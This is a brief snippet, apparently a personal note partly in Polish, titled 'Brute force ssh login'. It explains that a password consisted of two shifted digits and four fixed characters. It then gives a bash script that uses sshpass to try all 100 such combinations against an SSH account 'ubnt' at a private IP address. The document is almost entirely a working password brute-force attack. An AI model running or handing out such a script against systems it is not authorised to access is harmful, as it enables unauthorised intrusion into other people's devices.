Brute force ssh login

apt-get install sshpass

Hasło zawierało 2 cyfry z shiftem oraz 4 stałe znaki

#!/bin/bash
TAB=("!" "@" "#" "$" "%" "^" "&" "*" "(" ")");
for (( i=0; $i <= 9; i++ )) ; do
for (( j=0; $j <= 9; j++ )) ; do
      PSS=${TAB[$i]}${TAB[$j]}"xxxx";
      echo $PSS;
sshpass -p "$PSS" ssh ubnt@10.10.197.77 
done
done